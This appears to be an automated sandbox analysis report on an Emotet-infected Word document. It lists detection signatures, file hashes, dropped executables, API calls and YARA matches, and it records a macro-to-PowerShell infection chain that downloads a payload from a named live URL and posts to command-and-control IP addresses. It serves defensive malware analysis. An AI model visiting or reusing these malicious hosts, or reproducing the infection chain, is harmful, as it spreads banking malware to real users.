Analysis Report E_FUHKOEGDW.doc

Overview

General Information

Sample Name: E_FUHKOEGDW.doc
Analysis ID: 299648
MD5: 0c304d7a8532eb6741856f5164b25d79
SHA1: 6913192575a8be5e5fa7e561feffc23a66a690fa
SHA256: fa3c245c0bfe5a4b95d229481cbdac5dc3798f1948badeecb3dc692f589c5f7f

Detection

Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
Creates processes via WMI
Drops executables to the windows directory (C:\Windows) and starts them
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Machine Learning detection for sample
PowerShell case anomaly found
Powershell drops PE file
Very long command line found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection:

Antivirus detection for URL or domain
Source: http://wiwildcare.org/wp-includes/Ri/ Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000005.00000002.2343060057.0000000000344000.00000004.00000001.sdmp Malware Configuration Extractor: Emotet
Multi AV Scanner detection for domain / URL
Source: http://wiwildcare.org/wp-includes/Ri/ Virustotal: Detection: 12%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe ReversingLabs: Detection: 25%
Multi AV Scanner detection for submitted file
Source: E_FUHKOEGDW.doc Virustotal: Detection: 53%
Machine Learning detection for dropped file
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: E_FUHKOEGDW.doc Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 4.2.Ay8g9b.exe.3c0000.0.unpack Avira: Label: TR/Dropper.Gen
Source: 5.2.wfapigp.exe.600000.1.unpack Avira: Label: TR/Dropper.Gen

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\SysWOW64\mfh264enc\wfapigp.exe Code function: 5_2_00602580 CryptImportKey,LocalFree,CryptCreateHash,CryptGenKey,CryptAcquireContextW,CryptDecodeObjectEx,CryptDecodeObjectEx,GetProcessHeap,RtlAllocateHeap, 5_2_00602580
Source: C:\Windows\SysWOW64\mfh264enc\wfapigp.exe Code function: 5_2_00602240 CryptDestroyHash,CryptGetHashParam,CryptExportKey,CryptEncrypt,memcpy,CryptDuplicateHash, 5_2_00602240
Source: C:\Windows\SysWOW64\mfh264enc\wfapigp.exe Code function: 5_2_00601FC0 CryptDuplicateHash,memcpy,CryptDecrypt,CryptDestroyHash,CryptVerifySignatureW, 5_2_00601FC0
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C37E0 FindFirstFileW,GetProcessHeap,GetProcessHeap,FindNextFileW, 4_2_003C37E0
Source: C:\Windows\SysWOW64\mfh264enc\wfapigp.exe Code function: 5_2_006037E0 FindFirstFileW,FindFirstFileW,_snwprintf,GetProcessHeap,HeapFree,_snwprintf,GetProcessHeap,HeapFree,FindNextFileW,FindNextFileW,FindClose, 5_2_006037E0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: wiwildcare.org
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 199.250.198.199:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 199.250.198.199:80

Networking:

HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /wp-includes/Ri/ HTTP/1.1
Host: wiwildcare.org
Connection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 199.250.198.199 199.250.198.199
Source: Joe Sandbox View IP Address: 208.180.207.205 208.180.207.205
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: SUDDENLINK-COMMUNICATIONSUS SUDDENLINK-COMMUNICATIONSUS
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /jTnDfr/P2mH/e2q7GgP0B4aetm/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Referer: 208.180.207.205/
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----------CcYOzGtFE2
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 208.180.207.205
Content-Length: 4468
Cache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 208.180.207.205
Source: C:\Windows\SysWOW64\mfh264enc\wfapigp.exe Code function: 5_2_00602930 GetProcessHeap,RtlAllocateHeap,InternetReadFile,GetProcessHeap,HeapFree,HttpQueryInfoW, 5_2_00602930
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{A04179F5-D643-47FF-B622-0CF30ED55516}.tmp
Source: global traffic HTTP traffic detected: GET /wp-includes/Ri/ HTTP/1.1
Host: wiwildcare.org
Connection: Keep-Alive
Source: unknown DNS traffic detected: queries for: wiwildcare.org
Source: unknown HTTP traffic detected: POST /jTnDfr/P2mH/e2q7GgP0B4aetm/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Referer: 208.180.207.205/
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----------CcYOzGtFE2
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 208.180.207.205
Content-Length: 4468
Cache-Control: no-cache
Source: Ay8g9b.exe, 00000004.00000002.2099896126.0000000002610000.00000002.00000001.sdmp, wfapigp.exe, 00000005.00000002.2343927965.00000000032B0000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: Ay8g9b.exe, 00000004.00000002.2099896126.0000000002610000.00000002.00000001.sdmp, wfapigp.exe, 00000005.00000002.2343927965.00000000032B0000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Potential key logger detected (key state polling based)
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_00405D73 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA, 4_2_00405D73

E-Banking Fraud:

Yara detected Emotet
Source: Yara match File source: 00000005.00000002.2343060057.0000000000344000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2099036668.00000000003C1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2098998804.0000000000270000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2343025997.0000000000300000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2343195521.0000000000601000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2099018567.0000000000324000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 5.2.wfapigp.exe.600000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.Ay8g9b.exe.3c0000.0.unpack, type: UNPACKEDPE
Source: C:\Windows\SysWOW64\mfh264enc\wfapigp.exe Code function: 5_2_00602580 CryptImportKey,LocalFree,CryptCreateHash,CryptGenKey,CryptAcquireContextW,CryptDecodeObjectEx,CryptDecodeObjectEx,GetProcessHeap,RtlAllocateHeap, 5_2_00602580

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Document image extraction number: 0 Screenshot OCR: Enable Editing and then click EnableContent
Source: Document image extraction number: 1 Screenshot OCR: Enable Editing and then click EnableContert
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe
Very long command line found
Source: unknown Process created: Commandline size = 5411
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\mfh264enc\wfapigp.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\mfh264enc\wfapigp.exe Memory allocated: 76D20000 page execute and read and write
Creates files inside the system directory
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe File created: C:\Windows\SysWOW64\mfh264enc\
Detected potential crypto function
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_004200B6 4_2_004200B6
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_0041114C 4_2_0041114C
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_00412221 4_2_00412221
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_00421236 4_2_00421236
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_004075CB 4_2_004075CB
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_004205FA 4_2_004205FA
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_00411621 4_2_00411621
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_004228E1 4_2_004228E1
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_004119F5 4_2_004119F5
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_00415A1E 4_2_00415A1E
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_00420B3E 4_2_00420B3E
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_00411E01 4_2_00411E01
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C81B0 4_2_003C81B0
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C7DD0 4_2_003C7DD0
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C6500 4_2_003C6500
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C7560 4_2_003C7560
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C3AF0 4_2_003C3AF0
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C3C10 4_2_003C3C10
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C1C90 4_2_003C1C90
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C3DF0 4_2_003C3DF0
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C3E17 4_2_003C3E17
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_0027382E 4_2_0027382E
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_0027809E 4_2_0027809E
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_002790FE 4_2_002790FE
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_0027996E 4_2_0027996E
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_002759B5 4_2_002759B5
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_0027598E 4_2_0027598E
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_00279D4E 4_2_00279D4E
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_0027568E 4_2_0027568E
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_002757AE 4_2_002757AE
Source: C:\Windows\SysWOW64\mfh264enc\wfapigp.exe Code function: 5_2_006081B0 5_2_006081B0
Source: C:\Windows\SysWOW64\mfh264enc\wfapigp.exe Code function: 5_2_00607560 5_2_00607560
Source: C:\Windows\SysWOW64\mfh264enc\wfapigp.exe Code function: 5_2_00606500 5_2_00606500
Source: C:\Windows\SysWOW64\mfh264enc\wfapigp.exe Code function: 5_2_00603C10 5_2_00603C10
Source: C:\Windows\SysWOW64\mfh264enc\wfapigp.exe Code function: 5_2_00603E17 5_2_00603E17
Source: C:\Windows\SysWOW64\mfh264enc\wfapigp.exe Code function: 5_2_00603AF0 5_2_00603AF0
Source: C:\Windows\SysWOW64\mfh264enc\wfapigp.exe Code function: 5_2_00603DF0 5_2_00603DF0
Source: C:\Windows\SysWOW64\mfh264enc\wfapigp.exe Code function: 5_2_00607DD0 5_2_00607DD0
Source: C:\Windows\SysWOW64\mfh264enc\wfapigp.exe Code function: 5_2_00601C90 5_2_00601C90
Source: C:\Windows\SysWOW64\mfh264enc\wfapigp.exe Code function: 5_2_0030382E 5_2_0030382E
Source: C:\Windows\SysWOW64\mfh264enc\wfapigp.exe Code function: 5_2_0030809E 5_2_0030809E
Source: C:\Windows\SysWOW64\mfh264enc\wfapigp.exe Code function: 5_2_0030568E 5_2_0030568E
Source: C:\Windows\SysWOW64\mfh264enc\wfapigp.exe Code function: 5_2_003090FE 5_2_003090FE
Source: C:\Windows\SysWOW64\mfh264enc\wfapigp.exe Code function: 5_2_0030996E 5_2_0030996E
Source: C:\Windows\SysWOW64\mfh264enc\wfapigp.exe Code function: 5_2_00309D4E 5_2_00309D4E
Source: C:\Windows\SysWOW64\mfh264enc\wfapigp.exe Code function: 5_2_003059B5 5_2_003059B5
Source: C:\Windows\SysWOW64\mfh264enc\wfapigp.exe Code function: 5_2_003057AE 5_2_003057AE
Source: C:\Windows\SysWOW64\mfh264enc\wfapigp.exe Code function: 5_2_0030598E 5_2_0030598E
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: E_FUHKOEGDW.doc OLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentation OLE, VBA macro: Module Zm360615gr5, Function Document_open Name: Document_open
Document contains embedded VBA macros
Source: E_FUHKOEGDW.doc OLE indicator, VBA macros: true
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe 24A1FF6CD8F455CA79F351CDAE937F2096A9BECF22D014ED351A43A03AEE835F
Found potential string decryption / allocating functions
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: String function: 00410BFE appears 82 times
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: String function: 00410DC0 appears 57 times
Yara signature match
Source: 00000005.00000002.2343302695.00000000008C0000.00000002.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: Ay8g9b.exe, 00000004.00000002.2098998804.0000000000270000.00000040.00000001.sdmp, wfapigp.exe, 00000005.00000002.2343060057.0000000000344000.00000004.00000001.sdmp Binary or memory string: IrdaMobile.sln
Source: Ay8g9b.exe, 00000004.00000002.2098998804.0000000000270000.00000040.00000001.sdmp, wfapigp.exe, 00000005.00000002.2343060057.0000000000344000.00000004.00000001.sdmp Binary or memory string: IrdaMobile.slnPK
Source: classification engine Classification label: mal100.troj.evad.winDOC@5/8@1/2
Source: C:\Windows\SysWOW64\mfh264enc\wfapigp.exe Code function: 5_2_00604B60 Process32NextW,Process32FirstW,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,CloseHandle,CloseHandle, 5_2_00604B60
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_00401060 LoadResource,LockResource,SizeofResource, 4_2_00401060
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C4F20 EnumServicesStatusExW,GetTickCount,ChangeServiceConfig2W,OpenServiceW,OpenServiceW,CloseServiceHandle,GetProcessHeap,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap, 4_2_003C4F20
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$FUHKOEGDW.doc
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRC0A0.tmp
Source: E_FUHKOEGDW.doc OLE indicator, Word Document stream: true
Source: E_FUHKOEGDW.doc OLE document summary: edited time not present or 0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................................................`I.........v.....................K........g............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................E..j....................................}..v.....V......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................E..j..... ..............................}..v....`W......0.................g............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....................................}..v.... d......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......g.............................}..v.....d......0.................g............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....#..................j....................................}..v....`.......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....#..................j..... ..............................}..v............0...............X.g............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....7...............%7.j.....Mg.............................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....7................4.j....p...............................}..v............0...............(Kg............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....C...............%7.j.....Mg.............................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....C................4.j....p...............................}..v............0...............(Kg............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....O...............%7.j.....Mg.............................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....O................4.j....p...............................}..v............0...............(Kg............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....[.......s.l.3.,. .T.l.s."..."...........................}..v............0................Jg............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....[................4.j....@...............................}..v............0...............(Kg............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....g.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.3.5.6.............}..v............0................Jg.....$....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....g................4.j....................................}..v............0...............(Kg............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....s...............%7.j.....Mg.............................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....s................4.j....................................}..v............0...............(Kg............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................%7.j.....Mg.............................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................4.j....................................}..v............0...............(Kg............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................%7.j.....Mg.............................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................E........................4.j....................................}..v............0...............(Kg............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................%7.j.....Mg.............................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................4.j....................................}..v............0...............(Kg............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................%7.j.....Mg.............................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................4.j....................................}..v............0...............(Kg............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................%7.j.....Mg.............................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................4.j....................................}..v............0...............(Kg.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................%7.j.....Mg.............................}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................%7.j.....Mg.............................}..v....."......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................4.j.....#..............................}..v.....$......0...............(Kg.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................%7.j.....Mg.............................}..v.....*......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................4.j.....+..............................}..v.....,......0...............(Kg.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....'...............%7.j.....Mg.............................}..v.....2......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....'................4.j.....3..............................}..v.....4......0...............(Kg.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....3...............%7.j.....Mg.............................}..v.....:......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....3................4.j.....;..............................}..v.....<......0...............(Kg.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....?...............%7.j.....Mg.............................}..v.....B......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....?................4.j.....C..............................}..v.....D......0...............(Kg.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....K...............%7.j.....Mg.............................}..v.....J......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....K................4.j.....K..............................}..v.....L......0...............(Kg.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....W...............%7.j.....Mg.............................}..v.....R......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....W................4.j.....S..............................}..v.....T......0...............(Kg.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....c...............%7.j.....Mg.............................}..v.....Z......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....c................4.j.....[..............................}..v.....\......0...............(Kg.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....o...............%7.j.....Mg.............................}..v.....b......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....o................4.j.....c..............................}..v.....d......0...............(Kg.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....{...............%7.j.....Mg.............................}..v.....j......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....{................4.j.....k..............................}..v.....l......0...............(Kg.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................%7.j.....Mg.............................}..v.....r......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................4.j.....s..............................}..v.....t......0...............(Kg.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................%7.j.....Mg.............................}..v.....z......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................4.j.....{..............................}..v.....|......0...............(Kg.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................%7.j.....Mg.............................}..v....8.......0.......................b.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................4.j....................................}..v....p.......0...............(Kg.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................%7.j.....Mg.............................}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................4.j....................................}..v....P.......0...............(Kg.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................%7.j.....Mg.............................}..v............0.......................r.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................4.j....X...............................}..v............0...............(Kg.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............ .......%7.j.....Mg.............................}..v....h.......0................Jg.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................4.j.... ...............................}..v............0...............(Kg.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................e..j.... Q[.............................}..v.....5......0.................g.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............_._.G.E.N.U.S. . . . . . . . . . .:. .2.........}..v....xI......0...............H.g.....(.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....]...............................}..v.....J......0...............H.g.............................
